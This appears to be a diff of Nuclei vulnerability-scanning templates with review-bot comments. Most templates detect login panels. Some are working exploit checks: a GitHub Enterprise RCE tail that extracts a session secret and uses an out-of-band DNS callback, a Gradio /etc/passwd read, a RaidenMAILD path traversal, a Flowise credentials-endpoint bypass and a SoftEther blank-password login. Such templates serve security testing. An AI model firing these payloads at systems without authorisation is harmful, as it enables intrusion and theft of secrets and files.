- 302
- type: word
words:
- "_gh_render"
part: header
- method: GET
path:
- "{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck"
extractors:
- type: regex
group: 1
name: ghe_secret
internal: true
regex:
- '&quot;ENTERPRISE_SESSION_SECRET&quot;=&gt;&quot;([^"]+?)&quot;'
part: body
matchers:
- type: word
words:
- 'ENTERPRISE_SESSION_SECRET'
part: body
- method: GET
path:
- "{{BaseURL}}/"
headers:
Cookie: _gh_render={{final_payoad}}
matchers-condition: and
matchers:
- type: status
status:
- 500
- type: word
part: interactsh_protocol
words:
- "dns"
# digest: 4b0a004830460221008cb530b7dece20ef5b28664e52e4b5123c761007f8a3021c46963b66706b95f8022100ba710c3a1d763987eb9872637d45f542155a84506b437d9e360f973235902443:922c64590222798bb761d5b6d8e72950
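Review bot: The template changes state on the target, yet `tags: cve,cve2024,rce,github,enterprise` carries neither `intrusive` nor `authenticated`. The third request creates a repository with `POST /api/v3/orgs/{{org_name}}/repos` and nothing later removes it, and the last request triggers a command on the server. Scans that exclude intrusive templates by tag would still run it, so I would use `tags: cve,cve2024,rce,github,enterprise,authenticated,intrusive` and state in the description that a repository is left behind for the operator to clean up. Separately, `cvss-metrics` lists `PR:N` while the description says the organization owner role is required, which is worth checking against the vendor advisory. The variable `final_payoad` is misspelled in both places it appears; it works, but `final_payload` reads better.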


@ -0,0 +1,74 @@
id: CVE-2024-1561
info:
name: Gradio Applications - Local File Read
author: Diablo
severity: high
description: |
Local file read by calling arbitrary methods of Components class
impact: |
Successful exploitation of this vulnerability could allow an attacker to read files on the server
remediation: |
Update to Gradio 4.13.0
reference:
- https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
- https://github.com/DiabloHTB/CVE-2024-1561
- https://nvd.nist.gov/vuln/detail/CVE-2024-1561
- https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-1561
cwe-id: CWE-29
epss-score: 0.00045
epss-percentile: 0.14639
metadata:
verified: true
max-request: 3
shodan-query: html:"__gradio_mode__"
tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET /config HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: first-component
part: body
group: 1
json:
- '.components[0].id'
internal: true
- raw:
- |
POST /component_server HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"component_id": "{{first-component}}","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
extractors:
- type: regex
name: tmpath
regex:
- \/[a-zA-Z0-9\/]+
internal: true
- raw:
- |
GET /file={{tmpath}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- regex('root:.*:0:0:', body)
- 'contains(header, "text/plain")'
condition: and
# digest: 490a004630440220321f22e77b20acc61afa7b5cbf1f465becdb09178d7c23342a1d1be0a11c843502205a9d96fc3f2429ce7f2566dce2a289b2ff6529266cee50a0d24bd60336562f19:922c64590222798bb761d5b6d8e72950
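Review bot: The `tmpath` extractor in the second request is looser than the flow needs. `\/[a-zA-Z0-9\/]+` has no `part:` and no anchor, so it captures the first run of slashes and alphanumerics anywhere in the response rather than specifically the returned cache path. Adding `part: body` and anchoring the pattern on the quote that opens the JSON string value would make the third request deterministic; the response shape is not visible here, so confirm it against a test instance. `group: 1` on the `type: json` extractor of the first request looks like a leftover from a regex extractor and can probably be dropped. The final matcher would also be tighter with `- 'status_code == 200'` next to the two existing DSL checks.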


@ -0,0 +1,51 @@
id: CVE-2024-3097
info:
name: NextGEN Gallery <= 3.59 - Missing Authorization to Unauthenticated Information Disclosure
author: DhiyanesDK
severity: medium
description: |
The WordPress Gallery Plugin NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin.
reference:
- https://plugins.trac.wordpress.org/browser/nextgen-gallery/trunk/src/REST/Admin/Block.php#L40
- https://www.wordfence.com/threat-intel/vulnerabilities/id/75f87f99-9f0d-46c2-a6f1-3c1ea0176303?source=cve
- https://zpbrent.github.io/pocs/8-plugin-nextgen-gallery-InfoDis-20240327.mp4
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-3097
cwe-id: CWE-862
epss-score: 0.00052
epss-percentile: 0.19521
cpe: cpe:2.3:a:imagely:nextgen_gallery:*:*:*:*:*:wordpress:*:*
metadata:
vendor: imagely
product: nextgen_gallery
framework: wordpress
publicwww-query: "/wp-content/plugins/nextgen-gallery/"
tags: cve,cve2024,wordpress,nextgen-gallery,wp-plugin,info-leak
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/ngg/v1/admin/block/image/1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"success":'
- '"image":'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4b0a00483046022100d937a4e33ba274ac20f1c8201f9a5ec5053252381b066f6ca34efbb0357112c5022100c5aa25daa1dcadea9076b1bfd0c414c26fd500c71e46d3e56461e1ef6be67149:922c64590222798bb761d5b6d8e72950
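Review bot: The body matcher accepts any JSON that merely contains the keys `"success":` and `"image":`. A response reporting `"success":false`, for example from a patched plugin or for a missing image id 1, could still be flagged if it returns status 200. Matching on the value, for example `- '"success":true'` (adjust spacing to the real response), or on one of the metadata fields the description mentions, would tie the finding to actual disclosure. The `metadata` block also lacks the `max-request` key that the other new templates in this commit carry.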


@ -16,7 +16,7 @@ info:
shodan-query: http.favicon.hash:-2051052918
tags: cve,cve2024,auth-bypass,flowise
requests:
http:
- method: GET
path:
- "{{BaseURL}}/API/V1/credentials"
@ -33,4 +33,4 @@ requests:
- type: status
status:
- 200
# digest: 4a0a004730450220155c2cf39c87f683e27013b8a5c62149ad330e29ba1cceaae4f2cf68c444c7fd022100bee7c37ed60defbdc183d24164dbb70fbb12ba6031a1393aae635c3eb7f3ef8c:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100d9304152d30fa5644b18033462ab1ed52f23ce5c4a695a6a8aebb824ca3ea457022100e6b1c27bfc23808cc83a3cad56e4e7796d3483c7fb35c8253aaddad5a1aac110:922c64590222798bb761d5b6d8e72950


@ -21,7 +21,7 @@ info:
shodan-query: html:"RaidenMAILD"
tags: cve,cve2024,lfi,raiden,mail,server
requests:
http:
- method: GET
path:
- "{{BaseURL}}/webeditor/../../../windows/win.ini"
@ -33,4 +33,4 @@ requests:
- 'contains(header, "application/octet-stream")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100b21edb32b4116b053ec5df064a8c2211cf7a2b9e6293731a8d9f4be377924cef0220379f8f6282665245242f29e33af2608658f85a062be362c3d0ba849564b85059:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100c68ae449c313523a338ad0b181aaa41e15eda98a9b200d3ed208a44ae24127a6022100e2c5a881638a9019355b8922941feb90086ba1dfe4d8175bfd566c3122caf772:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,43 @@
id: softether-vpn-default-login
info:
name: SoftEther VPN Admin Console - Default Login
author: bhutch
severity: high
description: |
The administrative password for the SoftEther VPN Server is blank.
reference:
- https://www.softether.org/4-docs/1-manual/3._SoftEther_VPN_Server_Manual/3.3_VPN_Server_Administration#Administration_Authority_for_the_Entire_SoftEther_VPN_Server
metadata:
verified: true
max-request: 1
shodan-query: title:"SoftEther VPN Server"
tags: misconfig,vpn,softether,default-login
http:
- raw:
- |
GET /admin/default/ HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
attack: pitchfork
payloads:
username:
- administrator
password:
-
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Create new Virtual Hub'
- 'Toggle navigation'
condition: and
- type: status
status:
- 200
# digest: 490a0046304402205c1ef0dce69c50da55acaa53406c82710813d759723176e6ef4e4fee858b7bca02200b895a7367f4e624433a856e0dbf9d38de950d2d115ca5c5527c82ad81ba5394:922c64590222798bb761d5b6d8e72950
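Review bot: The `password` payload is a bare `-`, which YAML reads as a null entry rather than an empty string. The template therefore relies on the engine turning that null into an empty string when it evaluates `base64(username + ':' + password)`. Writing the entry as `- ""` states the intended blank password explicitly and survives linters and loaders that reject or retype empty values. With a single username/password pair, `attack: pitchfork` is also unnecessary, though harmless.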


@ -0,0 +1,31 @@
id: ackee-panel
info:
name: Ackee Panel - Detect
author: userdehghani
severity: info
description: |
self-hosted, node.js based analytics tool for those who care about privacy.
reference:
- https://ackee.electerious.com/
- https://docs.ackee.electerious.com/
metadata:
verified: true
max-request: 2
shodan-query: http.favicon.hash:-1495233116
tags: panel,ackee,login,detect
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/favicon.ico"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code==200 && contains(tolower(body), "<title>ackee")'
- "status_code==200 && (\"-1495233116\" == mmh3(base64_py(body)))"
condition: or
# digest: 4b0a004830460221008f061832211cdc60b4f105a9623e07e810e376ebd87114c6c5d1a44384f7a50d022100e0170bd8a83aeb161c606e362f8752d638435fca57bf17b2b09f76dd7caa9350:922c64590222798bb761d5b6d8e72950
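Review bot: The `description` is the product's tagline (`self-hosted, node.js based analytics tool for those who care about privacy.`) and does not say what the template reports. That text is what a reader of the template sees when triaging a result. Something like `Ackee login panel was detected.` matches the wording used by the righettod panel templates in this commit. The same applies to the descriptions in ghost-panel, matomo-panel, n8n-panel, tiny-rss-panel, umami-panel and unleash-panel.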


@ -1,19 +1,19 @@
id: apache-apisix-panel
info:
name: Apache APISIX Login Panel
author: pikpikcu
name: Apache APISIX Login Panel - Detect
author: pikpikcu,righettod
severity: info
description: An Apache APISIX login panel was detected.
classification:
cwe-id: CWE-200
cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:*
metadata:
fofa-query: title="Apache APISIX Dashboard"
max-request: 1
product: apisix
vendor: apache
tags: apache,apisix,panel
fofa-query: title="Apache APISIX Dashboard"
tags: apache,apisix,panel,login,detect
http:
- method: GET
@ -30,4 +30,11 @@ http:
- type: status
status:
- 200
# digest: 4b0a004830460221009511db3bd4110569d3adb76780b1eae709159c92d71b9fd0e0f3665aa25c65ef02210080459d36c4880e531941e8516355f1deb7e67881bc8a203be2cf734becaa4d4e:922c64590222798bb761d5b6d8e72950
extractors:
- type: regex
part: header
group: 1
regex:
- '(?i)Server:\s+APISIX\/([0-9.]+)'
# digest: 490a00463044022077db8164de460b6d9fad9c437f6f20ddff3d1130da4410d3e8fef855a71f69cc02205e85b466ed5fc18cbf90faa089c1beeae3b91c11e43f89454ab0b3eca85e9f73:922c64590222798bb761d5b6d8e72950


@ -12,10 +12,13 @@ info:
cwe-id: CWE-200
cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
product: cacti
vendor: cacti
tags: tech,cacti,login,panel
shodan-query: http.favicon.hash:-1797138069
fofa-query: icon_hash="-1797138069"
tags: cacti,login,panel,detect
http:
- method: GET
@ -25,18 +28,14 @@ http:
stop-at-first-match: true
matchers-condition: and
matchers-condition: or
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "<title>Login to Cacti</title>"
- "The Cacti Group"
condition: and
condition: or
- type: regex
part: header
@ -49,4 +48,4 @@ http:
group: 1
regex:
- "<div class='versionInfo'>Version (.*) |"
# digest: 4a0a0047304502210091466c451eb83a632009e16596e016864e58809145127b30333708c9965f718a0220698ba9fb6b9818ed4c6441084c12df39731e4a6124c062b93ca178bc2abd5ea4:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100b3110f2d77b3f6513cc8f7e915660505f5f1414f89715d1fc1a562bde90075fa02201dcff79552b3f5d1622fc45bda5868f3a4b43b6bc5edf01210dc46a04630f1a6:922c64590222798bb761d5b6d8e72950
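Review bot: With `matchers-condition: or` and the word matcher on `condition: or`, the string `The Cacti Group` anywhere in a body is enough to match, and the 200 status matcher no longer gates it. This assumes the `or` lines and the dropped status block are the new side, as the print order and the `-25,18 +28,14` counts suggest. The change widens the template to any page that merely mentions Cacti, including error pages and documentation mirrors. I would keep `<title>Login to Cacti</title>` as the body signal, or pair `The Cacti Group` with a second Cacti-specific string, and keep a 200 status requirement on the body branch. The regex header matcher continues past the end of this hunk, so its contribution to the `or` is not visible here.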


@ -14,7 +14,7 @@ info:
shodan-query: html:"Cassia Bluetooth Gateway Management Platform"
tags: cassia,gateway,login,panel
requests:
http:
- method: GET
path:
- "{{BaseURL}}/cassia/login"
@ -29,4 +29,4 @@ requests:
- type: status
status:
- 200
# digest: 4b0a00483046022100baabf488454e8584e30f25c730d6c8205a81001f9ce8402e9a0030146d3c7717022100dfdcbb0e792557b52b82af06286c1d278b9992528c519460c660113c0a6fa643:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402206c69b6c8548d94d08177c560687c5ec6af029a7511c5c523f616cf8f15844d4c022049e60a52750b8da203076f14e8fc0a4389656a8d09dea222c577ee04de8a08af:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,35 @@
id: craftercms-panel
info:
name: CrafterCMS Login Panel - Detect
author: righettod
severity: info
description: |
CrafterCMS login panel was detected.
reference:
- https://craftercms.org/
metadata:
max-request: 1
verified: true
shodan-query: http.title:"craftercms"
tags: panel,craftercms,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/studio/login"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(to_lower(body), "craftercmsnext", "login - craftercms", "crafter software corporation")'
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter'
# digest: 4a0a004730450221008f0a504337b6d23c677831b726cc8db9fd0d2f121cd363898e291746020c21010220587b99ea2eba7fdccb1f6883bbb072ee3516c6e0965f58f6b6ea1a38da1f6a91:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,36 @@
id: easyvista-panel
info:
name: EasyVista Login Panel - Detect
author: righettod
severity: info
description: |
EasyVista login panel was detected.
reference:
- https://www.easyvista.com/
metadata:
max-request: 1
verified: true
shodan-query: http.title:"Easyvista"
tags: panel,easyvista,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/index.php"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(to_lower(body), "<title>easyvista apps</title>", "easyvista-bundle.min.js", "packages_com_easyvista_core")'
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- '(?i)package:\s+"([a-z0-9._-]+)"'
- '(?i)version&nbsp;:&nbsp;([a-z0-9._-]+)'
# digest: 4a0a0047304502202e940a0d921638b03da755b8b6961674e2218da0b375b10c31c34de9181b8c7f022100fb7c93a0c82f313e5ace2cca365dc8d7b6c769efd178287dfd89795b47505360:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,36 @@
id: f5-next-central-manager
info:
name: F5 Next Central Manager Panel - Detect
author: EgemenKochisarli
severity: info
description: |
F5 Next Central Manager login panel was detected.
reference:
- https://clouddocs.f5.com/bigip-next/latest/use_cm/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
cpe: cpe:2.3:h:f5:big-ip:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: f5
product: big-ip
tags: panel,fortinet,login
http:
- method: GET
path:
- "{{BaseURL}}/gui/login"
matchers-condition: and
matchers:
- type: word
words:
- "<title>BIG-IP Next | Central Manager"
- type: status
status:
- 200
# digest: 4b0a00483046022100b3c8cbebbf5b6db93eb84a58ba8a629736bd27b2715e4e907afe8d4c16ffe808022100efb3278f5f84739a8835ab53f02255849df148e45d16593a8cf6655c65b51ed8:922c64590222798bb761d5b6d8e72950
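Review bot: `tags: panel,fortinet,login` labels an F5 product as Fortinet. A scan filtered on an `f5` tag skips this template, and one filtered on `fortinet` runs it against the wrong estate. `tags: panel,f5,login,detect` fits the `vendor: f5` metadata and the `detect` convention used by the other panel templates in this commit. The `cpe` and `product: big-ip` describe BIG-IP hardware rather than BIG-IP Next Central Manager, so it is worth confirming that this is the intended CPE.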


@ -0,0 +1,31 @@
id: ghost-panel
info:
name: Ghost Panel - Detect
author: userdehghani
severity: info
description: |
Beautiful, modern publishing with email newsletters and paid subscriptions built-in.
reference:
- https://ghost.org/
metadata:
verified: true
max-request: 1
fofa-query: app="Ghost"
tags: panel,ghost,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/ghost/#/signin"
matchers-condition: or
matchers:
- type: word
part: body
words:
- '<title>Ghost Admin'
- 'content="Ghost"'
condition: or
case-insensitive: true
# digest: 490a0046304402202af11dfd43edc17a45dfc121349d833dbd78ff0697151d343819bb4d92d017ad02203d27811c2b3637bcec56100b871612a3681146bc78ceed7655293382f683ef14:922c64590222798bb761d5b6d8e72950
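Review bot: The path `{{BaseURL}}/ghost/#/signin` contains a URL fragment, and a fragment is not part of the HTTP request target. The server sees at most `/ghost/`, and `#/signin` only documents the client-side route. Writing the path as `{{BaseURL}}/ghost/` makes the request explicit and avoids depending on how the engine treats `#`. As written there is also no status check and `matchers-condition: or` governs a single matcher, so either word in any response body matches; a 200 status matcher with `matchers-condition: and` would tighten it. The fragment point also applies to nocodb-panel (`/dashboard/#/signin`) and pocketbase-panel (`/_/#/login`).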


@ -4,28 +4,30 @@ info:
name: JFrog Login Panel - Detect
author: dhiyaneshDK
severity: info
description: JFrog login panel was detected.
description: |
JFrog login panel was detected.
reference:
- https://www.exploit-db.com/ghdb/6797
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
metadata:
verified: true
max-request: 1
tags: panel,jfrog,edb
shodan-query: http.title:"JFrog"
tags: panel,jfrog,edb,detect,login
http:
- method: GET
path:
- '{{BaseURL}}/ui/login/'
- '{{BaseURL}}/ui/favicon.ico'
matchers-condition: and
stop-at-first-match: true
matchers:
- type: word
words:
- '<title>JFrog</title>'
- type: status
status:
- 200
# digest: 4b0a00483046022100bfa95e2d95db535d51023522742e67105a4ca44c2195a7bcae99ff18a8a3e215022100cc08d7c15e5b503a664ce40eeeb750549e654f290a8266192954330d210549ac:922c64590222798bb761d5b6d8e72950
- type: dsl
dsl:
- 'status_code==200 && contains(body, "<title>JFrog")'
- "status_code==200 && (\"-595620639\" == mmh3(base64_py(body)))"
condition: or
# digest: 4a0a004730450221009cfe5c81bde3f5c9462974f80c97205e62b24f03aab1a1893ca852fc0b0b49a802201c6f8e2531a0dc3974eb9f8b284db5527b43eaa7041e2eddbe10753137f5931f:922c64590222798bb761d5b6d8e72950
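Review bot: `max-request: 1` no longer matches the request list. The section now shows two paths, `/ui/login/` and `/ui/favicon.ico`, assuming the favicon line is an addition as `stop-at-first-match: true` and the new `mmh3` check suggest, so the value should be `max-request: 2`. matomo-panel has the same mismatch with three paths and `max-request: 1`, and nocodb-panel with two paths and `max-request: 1`. The field is used to estimate how many requests a scan will send, so an undercount understates the load placed on the target.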


@ -14,7 +14,7 @@ info:
metadata:
max-request: 1
product: kiwi_tcms
shodan-query: title:"Kiwi TCMS - Login",http.favicon.hash:-1909533337
shodan-query: title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337
vendor: kiwitcms
tags: kiwitcms,panel
@ -33,4 +33,4 @@ http:
group: 1
regex:
- "Version ([0-9.]+)"
# digest: 4a0a0047304502204970f122554d53140cadb0128e08750a33a2fa84fc89d097f5af68e1bfb2eb16022100cd6eb7291e86d5379a54e26a5c5d3abcd4ff5c0f505858a409d2b4da17d521f7:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100c7e0445fb0c4273073704f89e15d3964d3730fa6c57a6d21ae98ba39406c076102210096a4c3868ade5124d38d7a8312bcbd096227b224884baaef2d97163e6b82c9f0:922c64590222798bb761d5b6d8e72950


@ -1,34 +0,0 @@
id: matomo-login-portal
info:
name: Matomo Login Panel - Detect
author: Arr0way
severity: info
description: Matomo logjn panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
cpe: cpe:2.3:a:matomo:matomo:*:*:*:*:*:*:*:*
metadata:
max-request: 2
product: matomo
vendor: matomo
tags: panel,matomo
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/matomo"
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers:
- type: word
part: body
words:
- "Sign in"
- "Matomo"
condition: and
# digest: 4a0a0047304502201c4b93876d4b04d9b5b75c8c17fe6d03ec45002b413803af50ee269c8086c434022100ee5a2b5964c46e904239af345684bc5b2b5f2ebfba45afabdb42f040ca828a2d:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,46 @@
id: matomo-panel
info:
name: Matomo Panel - Detect
author: Arr0way,userdehghani
severity: info
description: |
google analytics alternative that protects your data and your customers privacy.
reference:
- https://matomo.org/
- https://matomo.org/faq/on-premise/installing-matomo/#getting-started
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
cpe: cpe:2.3:a:matomo:matomo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
product: matomo
vendor: matomo
shodan-query: http.favicon.hash:-2023266783
tags: panel,matomo,login,detect
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/index.php"
- "{{BaseURL}}/plugins/CoreHome/images/favicon.png"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body
words:
- 'Sign in - Matomo'
- 'content="Matomo'
- 'title="Matomo'
condition: or
case-insensitive: true
- type: dsl
dsl:
- "status_code==200 && (\"-2023266783\" == mmh3(base64_py(body)))"
# digest: 4a0a0047304502205217330d775233ed1853dd31211905403034b6f585c3e2b9623fcc9a8b79b5b0022100b9b40d58f73228425c1491bdce70eb1a39d2e087072d50864dad2f181de17cbf:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,33 @@
id: n8n-panel
info:
name: n8n Panel - Detect
author: userdehghani
severity: info
description: |
The worlds most popular workflow automation platform for technical teams
reference:
- https://n8n.io/
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-831756631
tags: panel,n8n,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/signin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>n8n.io'
case-insensitive: true
- type: status
status:
- 200
# digest: 490a00463044022059cb68de4684a6a5b94dca8dbf24660e161eecceb07d6a955c1fa897ba7713da02200a3ec6dda7bffc4b05016a3055540bfb789fead4544178489fd6494c108cd483:922c64590222798bb761d5b6d8e72950


@ -2,7 +2,7 @@ id: netscaler-aaa-login
info:
name: NetScaler AAA Login Panel - Detect
author: dhiyaneshDk
author: dhiyaneshDk,righettod
severity: info
description: NetScaler AAA login panel was detected.
reference:
@ -15,7 +15,7 @@ info:
max-request: 1
product: netscaler
vendor: citrix
tags: panel,netscaler,login,edb,citrix
tags: panel,netscaler,login,edb,citrix,detect
http:
- method: GET
@ -26,5 +26,6 @@ http:
- type: word
words:
- "NetScaler AAA</title>"
condition: and
# digest: 4a0a004730450221009bc41767207ec08510c28fd7db74f0a6be829e289c5817412fbf7c1a17229135022002a8cc7233b69e588e94f5ed9919a36b6964009eab52b096e3017b499ef78f6c:922c64590222798bb761d5b6d8e72950
- "_ctxstxt_NetscalerAAA"
condition: or
# digest: 4b0a00483046022100fc8390a0699abae759299064c59fc5ac4a3e0fda101ec74ba62d8362437ea339022100a02a6c73d54ef2e5655e15c3526ff0d9e2c91abbc96e47cf045c71e19c51618a:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,36 @@
id: nocodb-panel
info:
name: NocoDB Panel - Detect
author: userdehghani
severity: info
description: |
NocoDB Login panel was discovered.
reference:
- https://www.nocodb.com/
- https://docs.nocodb.com/
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:206985584
tags: panel,nocodb,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/dashboard/#/signin"
- "{{BaseURL}}/dashboard/favicon.ico"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body
words:
- 'content="NocoDB'
case-insensitive: true
- type: dsl
dsl:
- "status_code==200 && (\"206985584\" == mmh3(base64_py(body)))"
# digest: 4a0a004730450220714636130a5e204032c15b6e2559e50c5dc598f220ac85fdf5d0d0d98feec3ee022100836baf611ae336e0d9d107a9c9d3acd8c159804a0632983e87209fb0819e2790:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,34 @@
id: pocketbase-panel
info:
name: PocketBase Panel - Detect
author: userdehghani
severity: info
description: |
PocketBase Login panel was discovered.
reference:
- https://pocketbase.io/
- https://pocketbase.io/docs/
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:981081715
tags: panel,pocketbase,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/_/#/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>PocketBase'
case-insensitive: true
- type: status
status:
- 200
# digest: 4b0a00483046022100f1f276ce2fb2420838d2f811e2b64dc4f881f87e145e1f5eaf9a6c5526bdc1fe022100c06c702de4ff917e3a3dc700b377ff3054243af2c89c6e2bcd36c447560b85e2:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,31 @@
id: qlikview-accesspoint-panel
info:
name: QlikView AccessPoint Login Panel - Detect
author: righettod
severity: info
description: |
QlikView AccessPoint login panel was detected.
reference:
- https://help.qlik.com/en-US/qlikview/May2023/Subsystems/QMC/Content/QV_QMC/QMC_System_Setup_QlikViewWebServers_AccessPoint.htm
metadata:
verified: true
max-request: 1
shodan-query: title:"QlikView - AccessPoint"
tags: panel,qlikview,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/qlikview/FormLogin.htm"
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(to_lower(body), "<title>qlikview - accesspoint", "alt=\"qlikview")'
condition: and
# digest: 4a0a00473045022100a06d783199cb65eae6682616e041f14ba523e0f4d1e74241c6dee95de224ef4b02201fdc28b5e00862150ebb7320d3188b6d7a41b2b7377c8aca554768b3d99c435a:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,28 @@
id: tiny-rss-panel
info:
name: Tiny RSS Panel - Detect
author: userdehghani
severity: info
description: |
Tiny Tiny RSS is a free RSS feed reader
reference:
- https://tt-rss.org/
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-418614327
tags: panel,tiny-rss,login,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'status_code==200'
- 'contains_any(body, "Tiny Tiny RSS", "ttrss_login", "ttrss_utility")'
condition: and
# digest: 4a0a00473045022100840ed0e143bb8658c51929c452c2c7f11395d2611929d4b2306fb2c7bdfc881002205726c2e4a715d6d13a7b64305182dd78122a0c4e647bf3e6ed66f815b2d8577b:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,43 @@
id: umami-panel
info:
name: Umami Panel - Detect
author: userdehghani
severity: info
description: |
simple, fast, privacy-focused, open-source analytics solution.
reference:
- https://umami.is/
- https://umami.is/docs
metadata:
verified: true
max-request: 3
shodan-query: http.favicon.hash:-130447705
tags: panel,umami,login,detect
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/login"
- "{{BaseURL}}/favicon.ico"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code==200 && contains_any(tolower(body), "Login | umami", "umami</div>", "umami</h1>", "<title>umami - login")'
- "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))"
condition: or
- method: GET
path:
- "{{BaseURL}}/~404"
extractors:
- type: regex
part: body
regex:
- 'v(?P<version>\d+\.\d+\.\d+)'
# digest: 490a00463044022057cb7369c95c71f95c75ff52799af65aadbe03982e0a51870dc0b8912897932402201c21a65921c649934e56e808ee0076cc892841ec816ad72cbcb49549e3995a62:922c64590222798bb761d5b6d8e72950
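Review bot: The first literal in the first DSL expression can never match. The body is passed through `tolower()` but compared with `"Login | umami"`, which contains an uppercase `L`. Lower-casing the literal fixes it: `contains_any(tolower(body), "login | umami", "umami</div>", "umami</h1>", "<title>umami - login")`. The second request (`/~404`) has only an extractor and no matcher while the template declares `flow: http(1) && http(2)`, so it is worth confirming that a detected panel is still reported when the version regex finds nothing.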


@ -0,0 +1,40 @@
id: unleash-panel
info:
name: Unleash Panel - Detect
author: userdehghani
severity: info
description: |
Open-source feature management solution built for developers.
reference:
- https://www.getunleash.io/
metadata:
verified: true
max-request: 3
shodan-query: http.favicon.hash:-608690655
tags: panel,unleash,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/login"
- "{{BaseURL}}/sign-in"
- "{{BaseURL}}/favicon.ico"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body
words:
- '<title>Unleash'
- 'content="unleash'
- 'alt="getunleash'
- 'Sign-in - Unleash hosted'
case-insensitive: true
condition: or
- type: dsl
dsl:
- "status_code==200 && (\"-608690655\" == mmh3(base64_py(body)))"
# digest: 490a00463044022014fd08bb5e7f980ecf35eb263ef728dff1b0b8ca20cfee86410abeb3f180c9c5022036ad4163750eaee7d3271a6ccc3f10245b3d4aa1a16be7f68e9eb6e04b2e54c0:922c64590222798bb761d5b6d8e72950


@ -8,12 +8,12 @@ info:
Realtime website and application monitoring tool
reference:
- https://github.com/louislam/uptime-kuma
